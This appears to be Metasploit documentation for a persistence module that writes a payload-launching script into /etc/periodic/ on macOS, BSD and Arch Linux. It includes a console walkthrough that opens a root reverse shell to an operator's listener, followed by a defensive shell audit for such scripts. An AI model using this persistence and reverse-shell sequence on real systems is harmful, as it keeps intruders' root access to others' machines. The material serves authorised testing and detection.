## Description

This module provides a persistence mechanism on OSX, BSD and Arch Linux using periodic scripts. The module writes a script to `/etc/periodic/daily/`, `/etc/periodic/weekly/` or `/etc/periodic/monthly/`. This script then executes a payload, which is written to `/tmp/` by default.

## Verification Steps

1. Obtain a session with superuser privileges; only the root user has write permissions to `/etc/periodic/`
2. Do: `use exploit/multi/local/periodic_script_persistence`
3. Do: `set session #`
4. Do: `set target #`
5. Do: `set payload #`
6. Do: `set verbose true`
7. Do: `exploit`

## Options

### PERIODIC_DIR

Periodic directory to write the script to, e.g. `/etc/periodic/daily`

### PERIODIC_SCRIPT_NAME

Name of the periodic script

## Scenarios

```
msf6 exploit(multi/local/periodic_script_persistence) > set session 1
session => 1
msf6 exploit(multi/local/periodic_script_persistence) > run verbose=true
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. /etc/periodic/daily/ is writable
[*] Writing '/etc/periodic/daily/jX3dG9' (118 bytes) ...
[*] Succesfully wrote periodic script to /etc/periodic/daily/jX3dG9.
[*] Cleanup command 'sudo rm/etc/periodic/daily/jX3dG9'
msf6 exploit(multi/local/periodic_script_persistence) > handler -p cmd/unix/reverse_zsh -P 4444 -H ens39
[*] Payload handler running as background job 4.

msf6 exploit(multi/local/periodic_script_persistence) >
[*] Started reverse TCP handler on 192.168.168.219:4444
[*] Command shell session 6 opened (192.168.168.219:4444 -> 192.168.168.175:49190) at 2025-08-29 17:49:54 +0200

msf6 exploit(multi/local/periodic_script_persistence) > sessions

Active sessions
===============

  Id  Name  Type                 Information            Connection
  --  ----  ----                 -----------            ----------
  1         meterpreter x64/osx  root @ mss-Mac.local   192.168.168.219:4242 -> 192.168.168.175:49165 (192.168.168.175)
  6         shell cmd/unix                              192.168.168.219:4444 -> 192.168.168.175:49190 (192.168.168.175)

msf6 exploit(multi/local/periodic_script_persistence) > sessions 6
[*] Starting interaction with 6...

id
uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),12(everyone),20(staff),29(certusers),61(localaccounts),80(admin),701(com.apple.sharepoint.group.1),33(_appstore),98(_lpadmin),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae)
```
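
For defenders, the artifacts in the scenario above (a randomly named script in a periodic directory that launches a payload from `/tmp/`) can be audited on a host. The following is an added example, not part of the module or of Metasploit; the function name `audit_periodic`, the finding labels and the `NNN.name` naming heuristic for stock scripts are assumptions of this example.

```shell
#!/bin/sh
# Added example (not module code): audit the periodic script directories for
# entries that deserve review. Prints one "REASON<TAB>PATH" line per finding.
# Usage: audit_periodic            (defaults to /etc/periodic)
#        audit_periodic /some/root (alternate root, e.g. a mounted disk image)

audit_periodic() {
    root=${1:-/etc/periodic}
    for dir in "$root/daily" "$root/weekly" "$root/monthly"; do
        [ -d "$dir" ] || continue
        for f in "$dir"/*; do
            [ -f "$f" ] || continue     # also skips an unmatched glob

            name=${f##*/}
            # 1. Assumption: stock scripts are named NNN.something
            #    (for example 999.local); anything else is unusual.
            case $name in
                [0-9][0-9][0-9].?*) ;;
                *) printf 'unusual-name\t%s\n' "$f" ;;
            esac

            # 2. The script refers to a temp directory, which is where the
            #    payload is written by default (/tmp/).
            if grep -Eq '/(tmp|var/tmp)/' "$f"; then
                printf 'references-tmp\t%s\n' "$f"
            fi

            # 3. The script is writable by group or others, so a non-root
            #    user could change what root runs on the next periodic run.
            if [ -n "$(find "$f" \( -perm -020 -o -perm -002 \) -print)" ]; then
                printf 'loose-perms\t%s\n' "$f"
            fi
        done
    done
}
```

A finding is a prompt for review, not proof of compromise: legitimate local scripts can also break the naming convention or touch temp directories.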